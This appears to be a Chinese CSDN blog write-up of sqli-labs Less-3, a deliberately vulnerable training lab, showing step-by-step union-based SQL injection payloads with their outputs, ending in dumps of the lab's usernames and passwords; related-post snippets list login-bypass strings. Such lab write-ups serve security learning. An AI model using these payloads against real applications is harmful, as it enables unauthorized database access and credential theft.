sqlilabs_3

已于 2022-07-08 16:21:01 修改
阅读量151 收藏
点赞数
分类专栏: sqlilabs 文章标签: sql 数据库
于 2022-07-05 14:45:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZERO_zero_0/article/details/125617989
版权

查看源代码:

if(isset($_GET['id']))

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

if($row)

{echo 'You are in...........';}

else 

{print_r(mysqli_error($con));}

输入形式为GET,注入格式为?id=*') * --+且当正确时会显示Your Login name:和Your Password:,错误时不会显示任何东西

列数:

?id=1') order by 1 --+

Your Login name:Dumb

Your Password:Dumb

?id=1') order by 2 --+

Your Login name:Dumb

Your Password:Dumb

?id=1') order by 3 --+

Your Login name:Dumb

Your Password:Dumb

?id=1') order by 4 --+

Unknown column '4' in 'order clause'

即列数为3

数据显示位置:

?id=0') union select 1,2,3 --+

Your Login name:2

Your Password:3

目前使用库名:

?id=0') union select 1,database(),3 --+

Your Login name:security

Your Password:3

即目前库名为security

security库中所有表名:

?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

Your Login name:2

Your Password:emails,referers,uagents,users

即security库中有emails,referers,uagents,users共4个表

users表中所有列名:

?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

Your Login name:2

Your Password:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

即users表中有USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password共6个列

username列中的所有值:

?id=0') union select 1,group_concat(username),3 from users --+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5

Your Password:3

即username列中有Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5共14个值

password列中的所有值:

?id=0') union select 1,2,group_concat(password) from users --+

Your Login name:2

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5

即password列中有Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5共14个值

ZERO_zero_0
关注
专栏目录
sqlilabs_4
ZERO_zero_0的博客
07-06 224
sqlilabs_4
sqli labs 3
Xiaoxiaoqiang_的博客
03-01 200
小学生
SQL注入之sqli-labs(三)
m0_60716947的博客
04-17 1986
(一)第十一关至第十五关(持续更新中) (1)第十一关 首先依旧是先加两行代码,便于学习
Sqli-labs 3
最新发布
qq_54190167的博客
07-11 280
sqli-labs关卡3
Sqlilabs-3
KAKA的博客
07-06 185
题目即为提示: Get类型+基于错误的注入+单引号+括号+string 可大概猜测开发者所使用的代码是: SELECT LOGIN_NAME,PASSWPRD,FROM TABLE WHERE ID = ('OUR INPUT HERE') 直接构造,不报错,去掉–+报错: http://sqlilabs/Less-3/?id=-1')--+ 接下来又是常规操作: http://sqlilabs/Less-3/?id=1') order by 3--+ http://sqlilabs/Less-3/?i
sqli labs 3
yy2013
10-11 228
题目:16 通过尝试,没有爆出sql语法错误的信息,因此尝试各种万能密码: ’ or 1=1 # ” or 1=1 # ‘) or 1=1 # “) or 1=1 # ‘)) or 1=1 # “)) or 1=1 # 进过测试:”) or 1=1 # 是万能密码,登录成功题目17: 初次尝试各种万能密码,没有
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqlilabs过关手册注入天书.pdf
09-14
"sqlilabs过关手册注入天书.pdf"是关于SQL注入学习与实践的一份资料,主要围绕名为sqli-labs的实验室环境进行介绍和讲解。 首先,文档提到了SQL注入和sqli-labs的介绍,强调了SQL注入的危害以及学习SQL注入的重要性...
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书》是一本专注于SQL注入技术的教程书籍,由lcamry编写,于2016年7月发布。该手册旨在引导读者通过一个名为sqlilabs的实验平台,来学习和掌握SQL注入的多种技巧和方法。 ### SQL注入基础 ...
sqli - labs - 3
m0_62102000的博客
07-02 186
Less-3GET-Error based- Single quotes with twust string
sqli-labs-3
m0_63190830的博客
07-09 180
sqli-labs-3
sqli-labs(3)
jimggg的博客
03-17 194
')闭合 上来就拿sqlmap先跑一下,看一下注入点,懂得源理后我觉得跟自己手动单双引号测试是一样的哈,上图 ‘)闭合,盲注先放着哈,先易后难! http://192.168.1.21/sqli-labs-master/Less-3/?id=1’) and 1=2–+ 后面跟第一题思路一样了,我就不上图了,该偷的懒一定要偷的 列查询order by,发现是3, http://192.168.1.2...
SQLi_Labs-3.Advanced Injections
梦里明明有六趣,觉后空空无大千
01-17 182
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
sqli-labs第三关
2402_82441920的博客
07-03 324
id=2'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。通过下面代码进行SQL注入。
sqlilabs-3 (闯关笔记)
qq_52642385的博客
04-23 2505
在这之前先观察在mysql数据库上执行一条如下指令: 紧接着: 截至到目前我们发现,这个id已经有了三种形式,整数型/ ‘’/ (‘’) 我们可以根据这个特性来构造相应的payload ①:直接?id=’会爆出提示 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use n...
sqli-labs Lesson-2详细过程
Brad_的博客
10-16 559
sqli-labs—————Less-3
Fly_鹏程万里
05-08 1794
Less-3根据提示传入参数id,数据类型为numeric老样子,用单引号测试报错的内容为:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at...
sqli-labs 通关笔记第三关
m0_66169375的博客
04-23 546
id=1') order by 4 --+ 回显错误,说明最大有3个字段可显示数据。1,判断注入类型:根据提示看出这关的注入类型是**单引号和单括号**型注入。id=1') and 1=2 回显出错误。3,使用union select 1,2,3 联合查询有几个显示位。id=1') order by 3 --+ 回显正常。id=1') and 1=1 --+回显正常。此处是-1而不是1,因为1是正常数字会占用显示位置。,回显可知,能看到的数据显示位只有2,3。5,爆破出数据库内的数据库名。
sqli_labs安装
04-13
3. 将sqli_labs的源代码放置在你的Web服务器的根目录下,确保它可以通过浏览器访问。 4. 创建一个MySQL数据库,并导入sqli_labs提供的SQL脚本。这个脚本将创建所需的数据库表和示例数据。 5. 修改sqli_labs的配置...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值